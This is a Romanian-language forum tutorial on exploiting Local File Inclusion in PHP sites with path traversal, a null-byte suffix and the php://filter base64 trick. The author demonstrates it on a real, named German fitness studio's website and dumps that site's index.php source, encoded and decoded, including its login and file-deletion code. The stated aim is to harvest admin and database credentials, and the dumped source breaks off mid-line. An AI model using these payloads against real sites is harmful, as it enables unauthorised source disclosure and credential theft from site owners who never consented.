Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 12/08/13 in all areas

  1. dancezar
    In acest tutorial veti invata metoda php://filter pentru a exploata un LFI. Ce este LFI: Lfi sau Local file inclusion presupune folosirea functiei inlclude din php intr-un mod necorespunzator,astfel prin LFI putem include(nu prelua pagina sursa) si executa codul php de pe orice pagina de pe server. Cum gasim un LFI: LFI apare deobicei sub forma aceasta site.com/index.php?page=ceva.php daca vom introduce dupa site.com/index.php?page=ceva.php; vom obtine o eroare de genul: http://s24.postimg.org/u93f51bth/lfi2.png Eroarea spune ca php nu poate include un fisier care nu exista.Folosindune de ../(un director inapoi) putem naviga prin foldere si include orice fisier de pe server site.com/index.php?page=../etc/passwd Folosirea caracterului null byte: Se foloseste atunci cand scriptul php pune dupa parametrul preluat, o extesie (de obicei .php .hrml .txt) .Caracterul null byte %00 "anuleaza" extesia care se afla dupa parametru si se foloseste astfel site.com/index.php?page=../etc/passwd%00 Acum ca am facut o scurta introductie aspra termenului LFI am sa prezint in continuare metoda php://filter. Sa presupunem ca aveti un LFI intr-un site puteti scoate /etc/passwd dar nu puteti gasi nici un log file ,iar metoda php://input nu functioneaza.Mai ramane inca o metoda de a exploata un LFI metoda php://filter. Cu aceasta metoda putem transforma un LFI intr-un Souce code discloure adica putem citi paginile sursa a fisierelor de pe server. Avem urmatorul LFI site.com/index.php?page=../etc/passwd http://s9.postimg.org/ipogmj0gf/lfi1.png Sa presupunem ca nu avem acces la loguri si nu putem transforma LFI in Remote code execution,vom incerca sa testam metoda php://filter . Metoda php://filter se foloseste astfel:site.com/index.php?page=php://filter/convert.base64-encode/resource=FISIER Unde FISIER este numele fisierul care vreti sa il cititi.Ce face instructiunea php://filter/convert.base64-encode/resource=FISIER?Pai ii spune functiei include sa preia continutul pagini FISIERsa il encodeze in base64 si sa il afiseze.Aceasta intructiune functionaza doar pe scripturile care folosesc ca metoda de intrare functia include si doar cele care nu au altceva in fata dupa parametrul injectie( ca de exemplu include('pages'.$_REQUEST['page']). Rezultatul v-a fi urmatorul eu am citit chiar fisierul index.php: http://s24.postimg.org/hx9pj12qd/lfi3.png In pagina ni se v-a furniza continutul pagini sursa encodat in base64 si cu ajutorul unui decodor putem obtine continutul pagini sursa. Aplicabilitate: Ce se poate face cu aceasta metoda:-/ Pai putem lua acces la datele de logare de la panouri de administrare sau de la baze de date. Avem urmatorul site:Sportstudio Bodyworld Schkeuditz bei Leipzig http://s23.postimg.org/ta0365agb/lfi4.png Vom testa metoda php://filter si vom citi pagina sursa a index.php: Sportstudio Bodyworld Schkeuditz bei Leipzig http://s21.postimg.org/x2fgrchg7/lfi5.png Ce am obtinut este: PD9waHANCiAgaW5jbHVkZSgidXNlci5waHAiKTsNCiAgJFBIUFNFU1NJRCA9ICRfUkVRVUVTVFsiUEhQU0VTU0lEIl07DQogICRwYWdlID0gJF9SRVFVRVNUWyJwYWdlIl07IA0KICAkYmVudXR6ZXJuYW1lID0gJF9SRVFVRVNUWyJiZW51dHplcm5hbWUiXTsNCiAgJHBhc3N3b3J0ID0gJF9SRVFVRVNUWyJwYXNzd29ydCJdOw0KICAkbG9naW4gPSAkX1JFUVVFU1RbImxvZ2luIl07DQogICRsb2dvdXQgPSAkX1JFUVVFU1RbImxvZ291dCJdOw0KICAkc2VuZGVuID0gJF9SRVFVRVNUWyJzZW5kZW4iXTsNCiAgJGRhdGVpID0gJF9SRVFVRVNUWyJkYXRlaSJdOw0KICANCiAgSWYgKCRiZW51dHplcm5hbWUgJiYgJHBhc3N3b3J0KQ0KICAgIElmICgkYmVudXR6ZXJuYW1lID09PSAkdXNlciAmJiAkcGFzc3dvcnQgPT09ICRwYXNzKSB7DQogICAgICBzZXNzaW9uX3N0YXJ0KCk7DQogICAgICBoZWFkZXIoIkxvY2F0aW9uOiBpbmRleC5waHA/cGFnZT1sb2dpbi5waHAmbG9naW49b2siKTsNCiAgICB9DQogICAgZWxzZSB7DQogICAgICBoZWFkZXIoIkxvY2F0aW9uOiBpbmRleC5waHA/cGFnZT1sb2dpbi5waHAmbG9naW49ZmFsc2NoIik7DQogICAgfQ0KICBlbHNlIHsNCiAgICBJZiAoJFBIUFNFU1NJRCkgew0KICAgICAgc2Vzc2lvbl9zdGFydCgkUEhQU0VTU0lEKTsNCiAgICB9DQogIH0NCiAgSWYgKCRzZW5kZW4pIHsNCiAgICBJZiAoJHNlbmRlbj09IkphIikgew0KICAgICAgJGJpbGQgPSAkX1JFUVVFU1RbImJpbGQiXTsNCiAgICAgIElmICgkYmlsZCkgew0KICAgICAgICBAdW5saW5rKCIuL25ld3NfcGljcy8kYmlsZCIpOw0KICAgICAgfQ0KICAgICAgQHVubGluaygkZGF0ZWkpOw0KICAgICAgaGVhZGVyKCJMb2NhdGlvbjogaW5kZXgucGhwP3BhZ2U9bmV3c19sb2VzY2hlbi5waHAmYW50dz0kc2VuZGVuJmRhdGVpPSRkYXRlaSIpOw0KICAgIH0NCiAgICBlbHNlaWYgKCRzZW5kZW49PSJOZWluIikgew0KICAgICAgaGVhZGVyKCJMb2NhdGlvbjogaW5kZXgucGhwP3BhZ2U9bmV3c19sb2VzY2hlbi5waHAmYW50dz0kc2VuZGVuJmRhdGVpPSRkYXRlaSIpOw0KICAgIH0NCiAgfQ0KICANCj8+DQoNCjwhRE9DVFlQRSBIVE1MIFBVQkxJQyAiLS8vVzNDLy9EVEQgSFRNTCA0LjAxIFRyYW5zaXRpb25hbC8vRU4iPg0KPGh0bWw+DQo8aGVhZD4NCgk8dGl0bGU+U3BvcnRzdHVkaW8gQm9keXdvcmxkIFNjaGtldWRpdHogYmVpIExlaXB6aWc8L3RpdGxlPg0KCTxtZXRhIG5hbWU9IkRDLlRpdGxlIiBjb250ZW50PSJwYzR1c2VyLmRlIC0gd2ViZGVzaWduIC0gd2VidGVjIj4NCjxtZXRhIG5hbWU9IkRDLkNyZWF0b3IiIGNvbnRlbnQ9IkRldGxldiBMaWViaW5nIj4NCjxtZXRhIG5hbWU9IkRDLlN1YmplY3QiIGNvbnRlbnQ9IlNwb3J0LCBGaXRuZXNzLCBGaXRuZXNzLVN0dWRpbywgRnJlaXplaXQsIFNvbGFyaXVtLCBTYXVuYSwgQm9keXdvcmxkLCBTcG9ydHN0dWRpbyI+DQo8bWV0YSBuYW1lPSJEQy5EZXNjcmlwdGlvbiIgICBjb250ZW50PSJwYzR1c2VyLmRlIC0gd2ViZGVzaWduIC0gd2VidGVjIj4NCjxtZXRhIG5hbWU9IkRDLlB1Ymxpc2hlciIgY29udGVudD0icGM0dXNlciI+DQo8bWV0YSBuYW1lPSJEQy5Db250cmlidXRvciIgY29udGVudD0iRGV0bGV2IExpZWJpbmciPg0KPG1ldGEgbmFtZT0iREMuRGF0ZSIgY29udGVudD0iMjAwOS0wMS0xNSI+DQo8bWV0YSBuYW1lPSJEQy5UeXBlIiBjb250ZW50PSJUZXh0Ij4NCjxtZXRhIG5hbWU9IkRDLkZvcm1hdCIgY29udGVudD0idGV4dC9odG1sIj4NCjxtZXRhIG5hbWU9IkRDLklkZW50aWZpZXIiIGNvbnRlbnQ9Imh0dHA6Ly93d3cucGM0dXNlci5kZSI+DQo8bWV0YSBuYW1lPSJEQy5Tb3VyY2UiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJEQy5MYW5ndWFnZSIgY29udGVudD0iZGUiPg0KPG1ldGEgbmFtZT0iREMuUmVsYXRpb24iIGNvbnRlbnQ9IlN0YXJ0c2VpdGUiPg0KPG1ldGEgbmFtZT0iREMuQ292ZXJhZ2UiIGNvbnRlbnQ9IkxlaXB6aWciPg0KPG1ldGEgbmFtZT0iREMuUmlnaHRzIiBjb250ZW50PSJBbGxlIFJlY2h0ZSBsaWVnZW4gYmVpIHBjNHVzZXItRGV0bGV2IExpZWJpbmciPg0KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJpbmRleCI+DQo8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9ImZvbGxvdyI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZGUiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZW4tdXMiIGNvbnRlbnQ9IiI+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgbGFuZz0iZW4iICBjb250ZW50PSIiPg0KPG1ldGEgaHR0cC1lcXVpdj0iY29udGVudC10eXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9SVNPLTg4NTktMSI+DQo8bWV0YSBodHRwLWVxdWl2PSJDb250ZW50LVNjcmlwdC1UeXBlIiBjb250ZW50PSJ0ZXh0L2phdmFzY3JpcHQiPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1TdHlsZS1UeXBlIiBjb250ZW50PSJ0ZXh0L2NzcyI+DQo8bWV0YSBodHRwLWVxdWl2PSJleHBpcmVzIiBjb250ZW50PSIwIj4NCjxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGUuY3NzIj4NCjwvaGVhZD4NCg0KPGJvZHkgdG9wbWFyZ2luPTAgbGVmdG1hcmdpbj0wIHJpZ2h0bWFyZ2luPTAgYm90dG9tbWFyZ2luPTA+DQoJPHRhYmxlIHdpZHRoPTk5MCBjZWxsc3BhY2luZz0wIGNlbGxwYWRkaW5nPTAgYm9yZGVyPTAgYWxpZ249bGVmdD4NCgkJPHRyPg0KCQkJPHRkIHdpZHRoPTk5MCBoZWlnaHQ9MjM5Pg0KCQkJCTx0YWJsZSB3aWR0aD05OTAgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGJvcmRlcj0wIGFsaWduPWxlZnQ+DQoJCQkJCTx0cj4NCgkJCQkJCTx0ZCB3aWR0aD05OTAgaGVpZ2h0PTMzIGNvbHNwYW49Mj4NCgkJCQkJCQk8IS0tLSBob3Jpem9udGFsZSBvYmVyc3RlIGhhdXB0bmF2aWdhdGlvbi0tLT4NCgkJCQkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQkJCQk8dHI+DQoJCQkJCQkJCQk8dGQgd2lkdGg9MTUwIGhlaWdodD0zMz48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCI+PGltZyBzcmM9ImdmeC9ibGF1LmpwZyIgYWx0PSIiIHdpZHRoPSIxNTAiIGhlaWdodD0iMzMiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQk8dGQgd2lkdGg9ODQgaGVpZ2h0PTMzPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWhvbWUucGhwIj48aW1nIHNyYz0iZ2Z4L2JsYXUuanBnIiBhbHQ9IiIgd2lkdGg9Ijg0IiBoZWlnaHQ9IjMzIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTExMSBoZWlnaHQ9MzM+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9aG9tZS5waHAiPjxpbWcgc3JjPSJnZngvYmxhdS5qcGciIGFsdD0iIiB3aWR0aD0iMTExIiBoZWlnaHQ9IjMzIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPSI2NDciIGJhY2tncm91bmQ9ImdmeC9vZWZmbnVuZ3N6ZWl0ZW4uanBnIj4mbmJzcDs8L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCTwvdGFibGU+DQoJCQkJCQk8L3RkPg0KCQkJCQk8L3RyPg0KCQkJCQk8dHI+DQoJCQkJCQk8dGQgd2lkdGg9NTYzIGhlaWdodD0yMDYgYmFja2dyb3VuZD0iZ2Z4L21pdHRlbGhlYWRlcmxpbmtzLmpwZyIgdmFsaWduPXRvcD4NCgkJCQkJCQk8dGFibGUgd2lkdGg9NTYzIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQkJCQkJPHRyPg0KCQkJCQkJCQkJPHRkIHJvd3NwYW49NCB3aWR0aD00NDMgaGVpZ2h0PTE3MD4mbmJzcDs8L3RkPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTEyMCBoZWlnaHQ9Nzk+Jm5ic3A7PC90ZD4NCgkJCQkJCQkJPC90cj4NCgkJCQkJCQkJPHRyPg0KCQkJCQkJCQkJPHRkIHdpZHRoPTEyMD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1ob21lLnBocCI+PGltZyBzcmM9ImdmeC9zZXJ2aWNlLmdpZiIgYWx0PSIiIHdpZHRoPSIxMjEiIGhlaWdodD0iMjMiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCTx0ZCB3aWR0aD0xMjA+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9c2VydmljZS5waHAiPjxpbWcgc3JjPSJnZngvc2VydmljZS5naWYiIGFsdD0iIiB3aWR0aD0iMTIxIiBoZWlnaHQ9IjMyIiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCQk8dHI+PHRkIHdpZHRoPTEyMD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1rb250YWt0ZS5waHAiPjxpbWcgc3JjPSJnZngva29udGFrdGUuZ2lmIiBhbHQ9IiIgd2lkdGg9IjEyMSIgaGVpZ2h0PSIzNiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQkJCQkgIDwvdHI+DQoJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCTx0ZCBjb2xzcGFuPTIgd2lkdGg9NTYzIGhlaWdodD0zNj4NCgkJCQkJCQkJCTwhLS0gdW50ZXJlIGhvcml6b250YWxlIGhhdXB0bmF2aS0tPg0KCQkJCQkJCQkJCTx0YWJsZSB3aWR0aD01NjMgY2VsbHNwYWNpbmc9MCBjZWxscGFkZGluZz0wIGJvcmRlcj0wIGFsaWduPWxlZnQ+DQoJCQkJCQkJCQkJCTx0cj4NCgkJCQkJCQkJCQkJCTx0ZCB3aWR0aD0xMTA+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9aG9tZS5waHAiPjxpbWcgc3JjPSJnZngvaG9tZS5naWYiIGFsdD0iIiB3aWR0aD0iNzIiIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCQk8dGQgd3VpZHRoPTcyPjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWFuZmFocnQucGhwIj48aW1nIHNyYz0iZ2Z4L2FuZmFocnQuZ2lmIiBhbHQ9IiIgd2lkdGg9IjExMCIgaGVpZ2h0PSIzNiIgYm9yZGVyPSIwIj48L2E+PC90ZD4NCgkJCQkJCQkJCQkJCTx0ZCB3aWR0aD0xMjc+PGEgaHJlZj0iaW5kZXgucGhwP3BhZ2U9YW5nZWJvdC5waHAiPjxpbWcgc3JjPSJnZngvYW5nZWJvdC5naWYiIGFsdD0iIiB3aWR0aD0iMTE1IiBoZWlnaHQ9IjM2IiBib3JkZXI9IjAiPjwvYT48L3RkPg0KCQkJCQkJCQkJCQkJPHRkIHdpZHRoPTE0MD48YSBocmVmPSJpbmRleC5waHA/cGFnZT1rb250YWt0LnBocCI+PGltZyBzcmM9ImdmeC9rb250YWt0LmdpZiIgYWx0PSIiIHdpZHRoPSIxMjciIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCQk8dGQgd2lkdGg9MTE1PjxhIGhyZWY9ImluZGV4LnBocD9wYWdlPWltcHJlc3N1bS5waHAiPjxpbWcgc3JjPSJnZngvaW1wcmVzc3VtLmdpZiIgYWx0PSIiIHdpZHRoPSIxNDAiIGhlaWdodD0iMzYiIGJvcmRlcj0iMCI+PC9hPjwvdGQ+DQoJCQkJCQkJCQkJCTwvdHI+DQoJCQkJCQkJCSAgPC90YWJsZT4JCQkJCQkJCQk8L3RkPg0KCQkJCQkJCQk8L3RyPg0KCQkJCQkJCTwvdGFibGU+DQoJCQkJCSAgPC90ZD4NCgkJCQkJCTwhLS0gcmVjaHRlciBoZWFkZXJ0ZWlsIG1pdHRlIChsb2dvKS0tPg0KCQkJCQkJPHRkIHdpZHRoPTQyNyBoZWlnaHQ9MjA2IGJhY2tncm91bmQ9ImdmeC9taXR0ZWxoZWFkZXJyZWNodHMuanBnIj4mbmJzcDs8L3RkPg0KCQkJCQk8L3RyPg0KCQkJCTwvdGFibGU+DQoJCQk8L3RkPg0KCQk8L3RyPg0KCQk8dHI+DQoJCQk8dGQgaGVpZ2h0PTcxIHdpZHRoPTk5MCBzdHlsZT0iYmFja2dyb3VuZC1pbWFnZTp1cmwoZ2Z4L3VudGVyaGVhZGVyLmpwZyk7IGJhY2tncm91bmQtcmVwZWF0Om5vLXJlcGVhdCIgdmFsaWduPXRvcD4NCgkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0Pg0KCQkJCQk8dHI+DQoJCQkJCQk8IS0tIG5ld3NoZWFkZXIgLS0tPg0KCQkJCQkJPHRkIHdpZHRoPTQwMCBoZWlnaHQ9NzEgdmFsaWduPSJib3R0b20iPg0KICAgICAgICAgICAgICA8dGFibGUgaWQ9InVlYmVyIj4NCiAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9MTkwPg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0yMTA+DQogICAgICAgICAgICAgICAgICAgIE5ld3MNCiAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgIDwvdGQ+DQoJCQkJCQk8IS0tIHVlYmVyc2NocmlmdCBkZXMgamV3ZWlsaWdlbiBpbmhhbHRlcyAtLT4NCgkJCQkJCTx0ZCB3aWR0aD01OTAgYWxpZ249ImxlZnQiIHZhbGlnbj0iYm90dG9tIj4NCiAgICAgICAgICAgICAgPHRhYmxlIGlkPSJ1ZWJlciI+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPTMwPg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD01NjA+DQogICAgICAgICAgICAgICAgICAgIDw/cGhwIA0KICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUoInVlYmVyc2NocmlmdGVuLnBocCIpOw0KICAgICAgICAgICAgICAgICAgICA/Pg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgPC90ZD4NCgkJCQkJPC90cj4NCgkJCQkJPHRyPg0KCQkJCQkJPCEtLSBuZXdzIC0tLT4NCgkJCQkJCTx0ZCB3aWR0aD00MDAgdmFsaWduPSJ0b3AiPg0KCQkJCQkJPCEtLSBhbiBkaWVzZXIgc3RlbGxlIHBocCBhdXMgZGF0ZW5iYW5rLS0+DQoJCQkJCQkgIDx0YWJsZT4NCiAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICA8dGQgdmFsaWduPSJ0b3AiPg0KICAgICAgICAgICAgICAgICAgICA8P3BocCBpbmNsdWRlKCJuZXdzLnBocCIpID8+DQogICAgICAgICAgICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgIDwvdGFibGU+DQoJCQkJCQk8L3RkPg0KCQkJCQkJPCEtLSAgamV3ZWlsaWdlciBpbmhhbHQgLS0+DQoJCQkJCQk8dGQgd2lkdGg9NTkwIHZhbGlnbj0idG9wIj4NCgkJCQkJCSAgPHRhYmxlIHdpZHRoPTU5MCBpZD0ibWFpbiI+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPTQ1PiZuYnNwOw0KICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICA8dGQgdmFsaWduPSJ0b3AiIHdpZHRoPTU2MD4NCiAgICAgICAgICAgICAgICAgICAgPD9waHAgDQogICAgICAgICAgICAgICAgICAgICAgSWYgKHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgImh0dHAiKSA9PT0gMCB8fCBzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJodHRwIikgPiAwKSB7ICRwYWdlPSJob21lLnBocCI7IH07DQogICAgICAgICAgICAgICAgICAgICAgSWYgKHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgInd3dyIpID09PSAwIHx8IHN0cnBvcygkX1JFUVVFU1RbInBhZ2UiXSwgInd3dyIpID4gMCkgeyAkcGFnZT0iaG9tZS5waHAiOyB9Ow0KICAgICAgICAgICAgICAgICAgICAgIElmIChzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJmdHAiKSA9PT0gMCB8fCBzdHJwb3MoJF9SRVFVRVNUWyJwYWdlIl0sICJmdHAiKSA+IDApIHsgJHBhZ2U9ImhvbWUucGhwIjsgfTsNCiAgICAgICAgICAgICAgICAgICAgICBJZiAoJHBhZ2UpIHsgaW5jbHVkZSgkcGFnZSk7IH0NCiAgICAgICAgICAgICAgICAgICAgICBlbHNlIHsgaW5jbHVkZSgiaG9tZS5waHAiKTsgfQ0KICAgICAgICAgICAgICAgICAgICA/Pg0KICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICA8L3RhYmxlPg0KCQkJCQkJPC90ZD4NCgkJCQkJPC90cj4NCgkJCQk8L3RhYmxlPg0KCQkJPC90ZD4NCgkJPC90cj4NCgkJPCEtLS0gZm9vdGVyLS0tPg0KCQk8dHI+DQoJCQk8dGQgd2lkdGg9OTkwIGhlaWdodD02MD4NCgkJCQk8dGFibGUgd2lkdGg9OTkwIGNlbGxzcGFjaW5nPTAgY2VsbHBhZGRpbmc9MCBib3JkZXI9MCBhbGlnbj1sZWZ0IGJhY2tncm91bmQ9ImdmeC9mb290ZXIuanBnIj4NCgkJCQkJPHRyPg0KICAgICAgICAgICAgPHRkIHdpZHRoPTMwPg0KICAgICAgICAgICAgICA8ZGl2IGFsaWduPSJqdXN0aWZ5Ij48L2Rpdj48L3RkPg0KICAgICAgICAgIDw/cGhwDQogICAgICAgICAgSWYgKCRQSFBTRVNTSUQpIHsNCiAgICAgICAgICAgIGVjaG8gIg0KICAgICAgICAgICAgPHRkIHdpZHRoPTg1MCBoZWlnaHQ9NjMgdmFsaWduPVwibWlkZGxlXCIgYWxpZ249XCJsZWZ0XCI+DQogIAkJCQkgICAgPGEgaHJlZj1cImxvZ291dC5waHBcIiBjbGFzcz1hZG1pbj5Mb2dvdXQ8L2E+DQoJCQkJCQk8L3RkPiI7DQogICAgICAgICAgfQ0KICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgZWNobyAiDQoJCQkJCQk8dGQgd2lkdGg9OTYwIGhlaWdodD02MyB2YWxpZ249XCJtaWRkbGVcIj4NCiAgCQkJCSAgICA8YSBocmVmPVwiaW5kZXgucGhwP3BhZ2U9aG9tZS5waHBcIj5Ib21lPC9hPg0KCQkJCQkJPC90ZD4iOw0KICAgICAgICAgIH0NCiAgICAgICAgICA/Pg0KCQkJCQk8L3RyPg0KCQkJCTwvdGFibGU+DQoJCQk8L3RkPg0KCQk8L3RyPg0KCTwvdGFibGU+DQo8L2JvZHk+DQo8L2h0bWw+ Decodat este: <?php include("user.php"); $PHPSESSID = $_REQUEST["PHPSESSID"]; $page = $_REQUEST["page"]; $benutzername = $_REQUEST["benutzername"]; $passwort = $_REQUEST["passwort"]; $login = $_REQUEST["login"]; $logout = $_REQUEST["logout"]; $senden = $_REQUEST["senden"]; $datei = $_REQUEST["datei"]; If ($benutzername && $passwort) If ($benutzername === $user && $passwort === $pass) { session_start(); header("Location: index.php?page=login.php&login=ok"); } else { header("Location: index.php?page=login.php&login=falsch"); } else { If ($PHPSESSID) { session_start($PHPSESSID); } } If ($senden) { If ($senden=="Ja") { $bild = $_REQUEST["bild"]; If ($bild) { @unlink("./news_pics/$bild"); } @unlink($datei); header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei"); } elseif ($senden=="Nein") { header("Location: index.php?page=news_loeschen.php&antw=$senden&datei=$datei"); } } ?> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Sportstudio Bodyworld Schkeuditz bei Leipzig</title> <meta name="DC.Title" content="pc4user.de - webdesign - webtec"> <meta name="DC.Creator" content="Detlev Liebing"> <meta name="DC.Subject" content="Sport, Fitness, Fitness-Studio, Freizeit, Solarium, Sauna, Bodyworld, Sportstudio"> <meta name="DC.Description" content="pc4user.de - webdesign - webtec"> <meta name="DC.Publisher" content="pc4user"> <meta name="DC.Contributor" content="Detlev Liebing"> <meta name="DC.Date" content="2009-01-15"> <meta name="DC.Type" content="Text"> <meta name="DC.Format" content="text/html"> <meta name="DC.Identifier" content="http://www.pc4user.de"> <meta name="DC.Source" content=""> <meta name="DC.Language" content="de"> <meta name="DC.Relation" content="Startseite"> <meta name="DC.Coverage" content="Leipzig"> <meta name="DC.Rights" content="Alle Rechte liegen bei pc4user-Detlev Liebing"> <meta name="robots" content="index"> <meta name="robots" content="follow"> <meta name="keywords" lang="de" content=""> <meta name="keywords" lang="en-us" content=""> <meta name="keywords" lang="en" content=""> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <meta http-equiv="Content-Script-Type" content="text/javascript"> <meta http-equiv="Content-Style-Type" content="text/css"> <meta http-equiv="expires" content="0"> <link rel="stylesheet" href="style.css"> </head> <body topmargin=0 leftmargin=0 rightmargin=0 bottommargin=0> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=990 height=239> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=990 height=33 colspan=2> <!--- horizontale oberste hauptnavigation---> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=150 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="150" height="33" border="0"></a></td> <td width=84 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="84" height="33" border="0"></a></td> <td width=111 height=33><a href="index.php?page=home.php"><img src="gfx/blau.jpg" alt="" width="111" height="33" border="0"></a></td> <td width="647" background="gfx/oeffnungszeiten.jpg"> </td> </tr> </table> </td> </tr> <tr> <td width=563 height=206 background="gfx/mittelheaderlinks.jpg" valign=top> <table width=563 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td rowspan=4 width=443 height=170> </td> <td width=120 height=79> </td> </tr> <tr> <td width=120><a href="index.php?page=home.php"><img src="gfx/service.gif" alt="" width="121" height="23" border="0"></a></td> </tr> <tr> <td width=120><a href="index.php?page=service.php"><img src="gfx/service.gif" alt="" width="121" height="32" border="0"></a></td> </tr> <tr><td width=120><a href="index.php?page=kontakte.php"><img src="gfx/kontakte.gif" alt="" width="121" height="36" border="0"></a></td> </tr> <tr> <td colspan=2 width=563 height=36> <!-- untere horizontale hauptnavi--> <table width=563 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <td width=110><a href="index.php?page=home.php"><img src="gfx/home.gif" alt="" width="72" height="36" border="0"></a></td> <td wuidth=72><a href="index.php?page=anfahrt.php"><img src="gfx/anfahrt.gif" alt="" width="110" height="36" border="0"></a></td> <td width=127><a href="index.php?page=angebot.php"><img src="gfx/angebot.gif" alt="" width="115" height="36" border="0"></a></td> <td width=140><a href="index.php?page=kontakt.php"><img src="gfx/kontakt.gif" alt="" width="127" height="36" border="0"></a></td> <td width=115><a href="index.php?page=impressum.php"><img src="gfx/impressum.gif" alt="" width="140" height="36" border="0"></a></td> </tr> </table> </td> </tr> </table> </td> <!-- rechter headerteil mitte (logo)--> <td width=427 height=206 background="gfx/mittelheaderrechts.jpg"> </td> </tr> </table> </td> </tr> <tr> <td height=71 width=990 style="background-image:url(gfx/unterheader.jpg); background-repeat:no-repeat" valign=top> <table width=990 cellspacing=0 cellpadding=0 border=0 align=left> <tr> <!-- newsheader ---> <td width=400 height=71 valign="bottom"> <table id="ueber"> <tr> <td width=190> </td> <td width=210> News </td> </tr> </table> </td> <!-- ueberschrift des jeweiligen inhaltes --> <td width=590 align="left" valign="bottom"> <table id="ueber"> <tr> <td width=30> </td> <td width=560> <?php include("ueberschriften.php"); ?> </td> </tr> </table> </td> </tr> <tr> <!-- news ---> <td width=400 valign="top"> <!-- an dieser stelle php aus datenbank--> <table> <tr> <td valign="top"> <?php include("news.php") ?> </td> </tr> </table> </td> <!-- jeweiliger inhalt --> <td width=590 valign="top"> <table width=590 id="main"> <tr> <td width=45> </td> <td valign="top" width=560> <?php If (strpos($_REQUEST["page"], "http") === 0 || strpos($_REQUEST["page"], "http") > 0) { $page="home.php"; }; If (strpos($_REQUEST["page"], "www") === 0 || strpos($_REQUEST["page"], "www") > 0) { $page="home.php"; }; If (strpos($_REQUEST["page"], "ftp") === 0 || strpos($_REQUEST["page"], "ftp") 